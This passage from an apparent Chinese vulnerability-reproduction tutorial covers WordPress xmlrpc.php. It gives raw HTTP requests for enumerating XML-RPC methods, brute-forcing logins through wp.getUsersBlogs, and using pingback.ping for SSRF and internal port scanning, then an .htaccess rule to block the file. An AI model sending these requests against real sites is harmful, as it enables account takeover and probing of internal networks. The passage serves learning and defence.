四、深入利用
(一)查看系统允许的方法
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
(二)账号爆破
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>password</value></param> </params> </methodCall>
(三)通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ....... <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>要探测的ip和端口:http://127.0.0.1:80</string></value> </param><param><value><string>要探测的URL</string> </value></param></params> </methodCall>
五、漏洞修复
(一)通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:
# protect xmlrpc <Files "xmlrpc.php"> Order Allow,Deny Deny from all </Files>
(二)删除根目录下的xmlrpc.php。
到此这篇关于复现WordPress xmlrpc.php漏洞和SSRF的文章就介绍到这了,更多相关WordPress漏洞复现内容请搜索
标签:WordPress
相关阅读 >>
详解wordpress中用于更新和获取用户选项数据的php函数
基于vue.js与wordpress rest api构建单页应用详解
wordpress wassup插件 spy.php脚本含sql注入漏洞
crayon syntax highlighter 强大的wp代码高亮插件安装方法
wordpress开发中的get_post_custom()函数使用解析
更多相关阅读请进入《wordpress》频道 >>